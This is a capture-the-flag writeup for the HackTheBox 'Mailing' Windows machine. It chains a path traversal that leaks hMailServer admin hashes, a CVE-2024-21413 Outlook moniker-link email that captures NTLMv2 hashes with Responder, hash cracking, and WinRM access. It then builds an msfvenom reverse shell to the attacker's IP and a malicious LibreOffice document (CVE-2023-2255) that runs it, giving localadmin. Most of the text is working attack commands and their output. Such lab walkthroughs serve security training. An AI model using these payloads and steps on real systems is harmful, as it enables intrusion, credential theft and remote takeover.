xsspresso
xsspresso
WriteupsHTB — Mailing
MiscEasyWindows

HTB — Mailing

hMailServer path traversal leaks admin hash. Outlook CVE-2024-21413 moniker link attack for NTLM relay, WinPEAS finds privesc vector.

January 16, 2025HackTheBox
#hMailServer#NTLM Relay#CVE-2024-21413#Path Traversal

nmap

sh
 nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 23:01 EST
Stats: 0:02:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 95.00% done; ETC: 23:03 (0:00:04 remaining)
Stats: 0:04:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 23:05 (0:00:00 remaining)
Nmap scan report for 10.10.11.14
Host is up (0.020s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp   open  pop3          hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
|_imap-capabilities: completed IMAP4 NAMESPACE QUOTA IDLE IMAP4rev1 CAPABILITY SORT RIGHTS=texkA0001 CHILDREN OK ACL
445/tcp   open  microsoft-ds?
465/tcp   open  ssl/smtp      hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp   open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
993/tcp   open  ssl/imap      hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_imap-capabilities: completed IMAP4 NAMESPACE QUOTA IDLE IMAP4rev1 CAPABILITY SORT RIGHTS=texkA0001 CHILDREN OK ACL
|_ssl-date: TLS randomness does not represent time
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
55136/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-17T04:05:26
|_  start_date: N/A
 
TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   21.84 ms 10.10.14.1
2   21.96 ms 10.10.11.14
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 293.16 seconds

80/tcp open http

sh
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb

LFI

  • click on the Download Instructions and intercept with burp suite

  • to test for LFI

txt
../../windows/win.ini

hMailServer

txt
../../Program+Files+(x86)\hMailServer\Bin\hMailServer.INI

txt
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Pragma: public
Content-Type: application/octet-stream
Expires: 0
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.3.3
Content-Description: File Transfer
Content-Disposition: attachment; filename="hMailServer.INI"
X-Powered-By: ASP.NET
Date: Fri, 17 Jan 2025 05:03:58 GMT
Connection: close
Content-Length: 604
 
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5ac...
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8...
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
txt
AdministratorPassword=841bb5ac...
sh
hashcat -m 0 '841bb5ac...' /usr/share/wordlists/rockyou.txt
 
841bb5ac...:homenetworkingadministrator
  • follow the instructions
sh
sudo apt install thunderbird
  • make sure to add mailing.htb to the ip address

CVE-2024-21413

  • https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
sh
python3 CVE-2024-21413.py --server "10.10.11.14" --port 587 --username "administrator@mailing.htb" --password "homenetworkingadministrator" --sender "administrator@mailing.htb" --recipient "maya@mailing.htb" --url "\\10.10.14.6\share" --subject "Please this is important"
 
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de
 
 Email sent successfully.
sh
sudo responder -I tun0
 
 
[SMB] NTLMv2-SSP Client   : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:e310528bce7e9100:1068AF9D06C2A9B351B4901F3775635B:010100000000000000A7C9E91869DB01D6863686B5E7E44900000000020008005500310033004E0001001E00570049004E002D0052005000410056004E0046003000360056004B00420004003400570049004E002D0052005000410056004E0046003000360056004B0042002E005500310033004E002E004C004F00430041004C00030014005500310033004E002E004C004F00430041004C00050014005500310033004E002E004C004F00430041004C000700080000A7C9E91869DB0106000400020000000800300030000000000000000000000000200000209F0A44EE6FC9A4D8BE239F8F0CA685844AE375865470E0545FDAF505814E1B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000
txt
maya::MAILING:e310528bce7e9100:1068AF9D06C2A9B351B4901F3775635B:010100000000000000A7C9E91869DB01D6863686B5E7E44900000000020008005500310033004E0001001E00570049004E002D0052005000410056004E0046003000360056004B00420004003400570049004E002D0052005000410056004E0046003000360056004B0042002E005500310033004E002E004C004F00430041004C00030014005500310033004E002E004C004F00430041004C00050014005500310033004E002E004C004F00430041004C000700080000A7C9E91869DB0106000400020000000800300030000000000000000000000000200000209F0A44EE6FC9A4D8BE239F8F0CA685844AE375865470E0545FDAF505814E1B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000

hashcat

sh
hashcat -m 5600 maya.ntlmv2 /usr/share/wordlists/rockyou.txt
 
MAYA::MAILING:e310528bce7e9100:1068af9d...:010100000000000000a7c9e91869db01d6863686b5e7e44900000000020008005500310033004e0001001e00570049004e002d0052005000410056004e0046003000360056004b00420004003400570049004e002d0052005000410056004e0046003000360056004b0042002e005500310033004e002e004c004f00430041004c00030014005500310033004e002e004c004f00430041004c00050014005500310033004e002e004c004f00430041004c000700080000a7c9e91869db0106000400020000000800300030000000000000000000000000200000209f0a44ee6fc9a4d8be239f8f0ca685844ae375865470e0545fdaf505814e1b0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000:m4y4ngs4ri

creds

maya:m4y4ngs4ri

sh
 nxc winrm 10.10.11.14 -u 'maya' -p 'm4y4ngs4ri'
WINRM       10.10.11.14     5985   MAILING          [*] Windows 10 / Server 2019 Build 19041 (name:MAILING) (domain:MAILING)
WINRM       10.10.11.14     5985   MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)

winrm

sh
evil-winrm -i 10.10.11.14 -u 'maya' -p 'm4y4ngs4ri'

user.txt

sh
*Evil-WinRM* PS C:\Users\maya\Desktop> cat user.txt
e39e367a...

priv esc

sh
*Evil-WinRM* PS C:\Users\maya> upload /opt/windows/winPEASx64.exe
sh
ÉÍÍÍÍÍÍÍÍÍ͹ UAC Status
È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-bypasss
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy: 1
    FilterAdministratorToken: 
      [*] LocalAccountTokenFilterPolicy set to 1.
      [+] Any local account can be used for lateral movement.
sh
ÉÍÍÍÍÍÍÍÍÍ͹ Checking write permissions in PATH folders (DLL Hijacking)
È Check for DLL Hijacking in PATH folders https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking
    C:\Windows\system32
    C:\Windows
    C:\Windows\System32\Wbem
    C:\Windows\System32\WindowsPowerShell\v1.0\
    C:\Windows\System32\OpenSSH\
    C:\Program Files\Git\cmd
    C:\Program Files\dotnet\
    (DLL Hijacking) C:\Users\maya\AppData\Local\Programs\Python\Python312: maya [AllAccess]

LibreOffice 7.4.0.1 CVE-2023-2255

sh
*Evil-WinRM* PS C:\Program Files\LibreOffice\program> cat version.ini
[Version]
AllLanguages=en-US af am ar as ast be bg bn bn-IN bo br brx bs ca ca-valencia ckb cs cy da de dgo dsb dz el en-GB en-ZA eo es et eu fa fi fr fur fy ga gd gl gu gug he hsb hi hr hu id is it ja ka kab kk km kmr-Latn kn ko kok ks lb lo lt lv mai mk ml mn mni mr my nb ne nl nn nr nso oc om or pa-IN pl pt pt-BR ro ru rw sa-IN sat sd sr-Latn si sid sk sl sq sr ss st sv sw-TZ szl ta te tg th tn tr ts tt ug uk uz ve vec vi xh zh-CN zh-TW zu
buildid=43e5fcfbbadd18fccee5a6f42ddd533e40151bcf
ExtensionUpdateURL=https://updateexte.libreoffice.org/ExtensionUpdateService/check.Update
MsiProductVersion=7.4.0.1
ProductCode={A3C6520A-E485-47EE-98CC-32D6BB0529E4}
ReferenceOOoMajorMinor=4.1
UpdateChannel=
UpdateID=LibreOffice_7_en-US_af_am_ar_as_ast_be_bg_bn_bn-IN_bo_br_brx_bs_ca_ca-valencia_ckb_cs_cy_da_de_dgo_dsb_dz_el_en-GB_en-ZA_eo_es_et_eu_fa_fi_fr_fur_fy_ga_gd_gl_gu_gug_he_hsb_hi_hr_hu_id_is_it_ja_ka_kab_kk_km_kmr-Latn_kn_ko_kok_ks_lb_lo_lt_lv_mai_mk_ml_mn_mni_mr_my_nb_ne_nl_nn_nr_nso_oc_om_or_pa-IN_pl_pt_pt-BR_ro_ru_rw_sa-IN_sat_sd_sr-Latn_si_sid_sk_sl_sq_sr_ss_st_sv_sw-TZ_szl_ta_te_tg_th_tn_tr_ts_tt_ug_uk_uz_ve_vec_vi_xh_zh-CN_zh-TW_zu
UpdateURL=https://update.libreoffice.org/check.php
UpgradeCode={4B17E523-5D91-4E69-BD96-7FD81CFA81BB}
UpdateUserAgent=<PRODUCT> (${buildid}; ${_OS}; ${_ARCH}; <OPTIONAL_OS_HW_DATA>)
Vendor=The Document Foundation
  • https://github.com/elweth-sec/CVE-2023-2255
sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o reverse.exe
sh
*Evil-WinRM* PS C:\users\maya> upload /home/sake/htb-labs/Mailing/reverse.exe
  • might need to upload the odt file to "Important Documents" it will be removed
sh
*Evil-WinRM* PS C:\Important Documents> ls
 
 
    Directory: C:\Important Documents
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/18/2025   6:41 AM             14 test.txt
 
 
*Evil-WinRM* PS C:\Important Documents> whoami
mailing\maya
*Evil-WinRM* PS C:\Important Documents> ls

sh
python3 CVE-2023-2255.py --cmd 'cmd.exe /c C:\users\maya\reverse.exe' --output rev.odt
 
File rev.odt has been created !
sh
smbclient \\\\10.10.11.14\\"Important Documents" -U 'mailing/maya'
Password for [MAILING\maya]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jan 18 00:42:12 2025
  ..                                  D        0  Sat Jan 18 00:42:12 2025
 
		8067583 blocks of size 4096. 1102513 blocks available
smb: \> put rev.odt 
putting file rev.odt as \rev.odt (304.1 kb/s) (average 304.1 kb/s)
cmd
 nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.14] 57876
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
 
C:\Program Files\LibreOffice\program>whoami
whoami
mailing\localadmin

root.txt

cmd
C:\Users\localadmin\Desktop>type root.txt
type root.txt
1b0afbdf...

Up next

EasyJan 2025

HTB — Analytics

Metabase pre-auth RCE CVE-2023-38646 via setup token SSRF for shell. Ubuntu OverlayFS CVE-2023-2640 local privilege escalation for root.

Read writeup
HardJan 2025

HTB — Backfire

HardHat C2 framework exposed via reverse proxy misconfiguration. JWT forgery for admin access, Sliver C2 implant exploitation for lateral movement.

Read writeup
EasyJan 2025

HTB — Broker

Apache ActiveMQ CVE-2023-46604 unauthenticated RCE via ClassInfo deserialization. Sudo nginx misconfiguration for arbitrary file read and root access.

Read writeup